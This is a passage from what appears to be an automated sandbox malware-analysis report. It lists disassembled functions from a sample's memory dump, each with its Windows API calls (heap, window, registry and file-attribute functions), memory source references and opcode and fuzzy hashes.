                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 492146193-0
                                                                                                                • Opcode ID: 7877989533cbc5b3fa0ca31bcce4eb95413f61b597e9fef56e943b8bf0eb3b06
                                                                                                                • Instruction ID: d1a193ab2e20c27520ec538e5f75e507fab189a90da301cc98243f80321b70b1
                                                                                                                • Opcode Fuzzy Hash: 7877989533cbc5b3fa0ca31bcce4eb95413f61b597e9fef56e943b8bf0eb3b06
                                                                                                                • Instruction Fuzzy Hash: 8EE086318056218BEA30977CB85894B3B54FB12370B124B71F975DA2D5CB34DC414798
                                                                                                                Function 004AF1DF Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 004AF2C6
                                                                                                                  • Part of subcall function 004B62F4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B6331
                                                                                                                  • Part of subcall function 004B62F4: RtlEnterCriticalSection.NTDLL(00000010), ref: 004B634C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 1616793339-0
                                                                                                                • Opcode ID: 63d995920bffc18b8655c62a2c9cd831f0378f043e6a859faf703b69fd73fe18
                                                                                                                • Instruction ID: ab4fcb4c8e1cda79f0ba90a68ed9fddfe8ff0e90b15d5c4c9b2376d01146c16c
                                                                                                                • Opcode Fuzzy Hash: 63d995920bffc18b8655c62a2c9cd831f0378f043e6a859faf703b69fd73fe18
                                                                                                                • Instruction Fuzzy Hash: C6212037900205ABDB10EFE5DC427DEB7A4EB22724F10417BF810EB2C1C77D99469A58
                                                                                                                Function 004AF0B8 Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,00000000,00000010,?,?,004AF278,00000009,?), ref: 004AF18C
                                                                                                                  • Part of subcall function 004B62F4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B6331
                                                                                                                  • Part of subcall function 004B62F4: RtlEnterCriticalSection.NTDLL(00000010), ref: 004B634C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterFreeHeapInitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 641406236-0
                                                                                                                • Opcode ID: bfdd59fe5a4daddcc2dbb38de88b9a3c59e0017f3438715b496d68fe2641e53d
                                                                                                                • Instruction ID: 5cc222f878d1b992edefbc0fe392e140553f88e957d0e6a3cdc02316fc8d294b
                                                                                                                • Opcode Fuzzy Hash: bfdd59fe5a4daddcc2dbb38de88b9a3c59e0017f3438715b496d68fe2641e53d
                                                                                                                • Instruction Fuzzy Hash: F721C572905204EADF21ABD5DC42BEE7778EF16324F24013BF414B51D1DB7C8D458AA9
                                                                                                                Function 004C6F50 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004C6FEE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: 312fa6ba7610cfc4cd1cede1fb89e3bbdb6678e317ebe2006dc5cd4729158db7
                                                                                                                • Instruction ID: 7fbec432939c7aebe9b1481ed274b8709c2b557bbbbc71c5e8439ab1bcc8c575
                                                                                                                • Opcode Fuzzy Hash: 312fa6ba7610cfc4cd1cede1fb89e3bbdb6678e317ebe2006dc5cd4729158db7
                                                                                                                • Instruction Fuzzy Hash: A631AC79A00219AFCF41DFA9C884EDEBBF1BF4C310B11846AF914E7210E7359A519F94
                                                                                                                Function 004D06B4 Relevance: 1.6, APIs: 1, Instructions: 54windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 004D0735
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: cfffc5c6ea81424416d4dc7dbe19a0e25f98f2ccfca41e8ad33bbde7d865860d
                                                                                                                • Instruction ID: 223d630d4a4b24388ee0b9a62766c4e1206685719a94aa081d0ca87e0d056612
                                                                                                                • Opcode Fuzzy Hash: cfffc5c6ea81424416d4dc7dbe19a0e25f98f2ccfca41e8ad33bbde7d865860d
                                                                                                                • Instruction Fuzzy Hash: 6F01C034340301AFDB249B31C829F6F76A5AF84744F05482FF842CB381DB69EC02CA98
                                                                                                                Function 0047EF15 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047EF1A
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0047FCF1: __EH_prolog.LIBCMT ref: 0047FCF6
                                                                                                                  • Part of subcall function 0047A801: __EH_prolog.LIBCMT ref: 0047A806
                                                                                                                  • Part of subcall function 0047A801: SetFileAttributesA.KERNEL32(00000000,00000080,?,?,0000005C,?,00000000,?,00000000,00000000), ref: 0047A8C7
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$AttributesDecrementFileIncrement
                                                                                                                • String ID:
                                                                                                                • API String ID: 3755930061-0
                                                                                                                • Opcode ID: cfb6a69f997e7f740d5775ac903448096167306a6132ba87a6a4649c94514a65
                                                                                                                • Instruction ID: 22edf8dc61d5678bfe6b10e21f5e00ba7805fce58b6edc5143d28f5b5d377da3
                                                                                                                • Opcode Fuzzy Hash: cfb6a69f997e7f740d5775ac903448096167306a6132ba87a6a4649c94514a65
                                                                                                                • Instruction Fuzzy Hash: 2B11CE717042009FD718DB65D99ABEE73E5EF44318F1442BEF40A9B2E1DB3C6A49CA08
                                                                                                                Function 004C670B Relevance: 1.5, APIs: 1, Instructions: 39windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                                                • SendMessageA.USER32(?,0000036E,?,00000000), ref: 004C675F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongMessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3360111000-0
                                                                                                                • Opcode ID: 8c9441b7a7e15112b23b753fe90dfe5bf9e1f9703e24eef012c080228bd4d762
                                                                                                                • Instruction ID: d7d80fffeff5242e9913d59d601a686f56473905a3c4757a989c215ea347cdda
                                                                                                                • Opcode Fuzzy Hash: 8c9441b7a7e15112b23b753fe90dfe5bf9e1f9703e24eef012c080228bd4d762
                                                                                                                • Instruction Fuzzy Hash: 0CF0C27A600208BBDF419F95D880EAEB7B9EF54358F10802FF90297240EB78ED019B54
                                                                                                                Function 004D029E Relevance: 1.5, APIs: 1, Instructions: 26windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostMessageA.USER32(?,00000362,0000E001,00000000), ref: 004D02D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: 6a92b3da62104e5c9eb4291301b70320603667a4384913b5177de26885f030df
                                                                                                                • Instruction ID: 42f243894a84c6f2bc0beb0cf4d43699ce9bd1fb9b446102b5a670fd77aa5428
                                                                                                                • Opcode Fuzzy Hash: 6a92b3da62104e5c9eb4291301b70320603667a4384913b5177de26885f030df
                                                                                                                • Instruction Fuzzy Hash: B4E03034201610AFDB205F249C5DF5A7691AF04730F218B6BF465972E1C6B58C418A59
                                                                                                                Function 00479182 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004791DF
                                                                                                                  • Part of subcall function 004D3DE1: __EH_prolog.LIBCMT ref: 004D3DE6
                                                                                                                  • Part of subcall function 004D3DE1: GetCurrentThread.KERNEL32 ref: 004D3E34
                                                                                                                  • Part of subcall function 004D3DE1: GetCurrentThreadId.KERNEL32 ref: 004D3E3D
                                                                                                                  • Part of subcall function 0046D587: __EH_prolog.LIBCMT ref: 0046D58C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$CurrentThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 37307217-0
                                                                                                                • Opcode ID: 2a767b3fe69302af24082e9137333bbbd63bd72c26ef9c53f36f48fbf1872cc2
                                                                                                                • Instruction ID: c67c4a3b7966bb7f2428f3be3b3cbc3944b491864373d79ba5959cf9ed090ea2
                                                                                                                • Opcode Fuzzy Hash: 2a767b3fe69302af24082e9137333bbbd63bd72c26ef9c53f36f48fbf1872cc2
                                                                                                                • Instruction Fuzzy Hash: 00E04F71E101609BD715DF45C4167ADB6B4FB01709F00456FA55267680DBB85E00879A
                                                                                                                Function 00405352 Relevance: 1.5, APIs: 1, Instructions: 17registryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegCloseKey.ADVAPI32(?,?,00404141,?,00404C1E,?,?,0040194C,?,?,?,00401643), ref: 0040535D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: 6e1ce0c2b900f4247d08527a62157054c45a72a6ab9d6623a275549ef1791126
                                                                                                                • Instruction ID: 63aa631b610dc24ae987779a63037b86cd81a4aaee0be20c03870fb5da714954
                                                                                                                • Opcode Fuzzy Hash: 6e1ce0c2b900f4247d08527a62157054c45a72a6ab9d6623a275549ef1791126
                                                                                                                • Instruction Fuzzy Hash: 37D05E32AA0B114BDB288A38E806BB676D4BB09325F150B3D544AD2680D67CD844865C
                                                                                                                Function 00405326 Relevance: 1.5, APIs: 1, Instructions: 17registryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegCloseKey.KERNEL32(?,?,0040413A,?,00404C1E,?,?,0040194C,?,?,?,00401643), ref: 00405331
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: af8a836f103095f5520ba7c76bf8a22c7b7e0aa0141647d93c78ec2dea393e0f
                                                                                                                • Instruction ID: d0286936fcaba64e54834185cd9a20b4573692e839711ef3cef73dca8a9ecd11
                                                                                                                • Opcode Fuzzy Hash: af8a836f103095f5520ba7c76bf8a22c7b7e0aa0141647d93c78ec2dea393e0f
                                                                                                                • Instruction Fuzzy Hash: 50D05E32660B114BDB288A29E8067AB36D89B09724F151B3D540AD2680C67CE8448A5C
                                                                                                                Function 0047A963 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,0047A8BB,?,?,0000005C,?,00000000,?,00000000,00000000), ref: 0047A96A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: ab5ff64a462ac66abf9c4a61fbd51062fa0a121fbff6943fbf81d1aaed59d95f
                                                                                                                • Instruction ID: 28e8287bf807d229f0b926238d0ac886160e5cd003f2e80f0da5201b7632a473
                                                                                                                • Opcode Fuzzy Hash: ab5ff64a462ac66abf9c4a61fbd51062fa0a121fbff6943fbf81d1aaed59d95f
                                                                                                                • Instruction Fuzzy Hash: 39D0A7B110013052C1102628DC48ACF6E04DB907B4F018A2AF619C41F5C3214CA3C699
                                                                                                                Function 004C9C87 Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadStringA.USER32(?,?,?,?), ref: 004C9C9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString
                                                                                                                • String ID:
                                                                                                                • API String ID: 2948472770-0
                                                                                                                • Opcode ID: 0c0e5a301bfefe032e674e7a95a1f583e608efff8566e35ab39e29ea695d7c11
                                                                                                                • Instruction ID: 4406e836ed60d0a265fc58f86d2ca5a4f19eb9a8ee7eb16a50e4321254071119
                                                                                                                • Opcode Fuzzy Hash: 0c0e5a301bfefe032e674e7a95a1f583e608efff8566e35ab39e29ea695d7c11
                                                                                                                • Instruction Fuzzy Hash: B3D0A7B64083A1ABCB01DF509808D4FBBE4BF65310F058C1EF49043211C324C804C766
                                                                                                                Function 004C9476 Relevance: 1.5, APIs: 1, Instructions: 12COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetWindowTextA.USER32(00000000,00000001), ref: 004C9484
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 530164218-0
                                                                                                                • Opcode ID: f299fbd2b692dafc00fbe8019f5bb0e35016e118652fc04b6151752bd13f98d6
                                                                                                                • Instruction ID: 322247e5cdf665128a38e50abd2c0086af5b3721df4c6fbb8fe1f035fb40e42c
                                                                                                                • Opcode Fuzzy Hash: f299fbd2b692dafc00fbe8019f5bb0e35016e118652fc04b6151752bd13f98d6
                                                                                                                • Instruction Fuzzy Hash: B1D09E34204100AFCF499F60D948E167BA1FF94705F21897DE046CA525D735CC53EB09
                                                                                                                Function 004C9592 Relevance: 1.5, APIs: 1, Instructions: 12COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
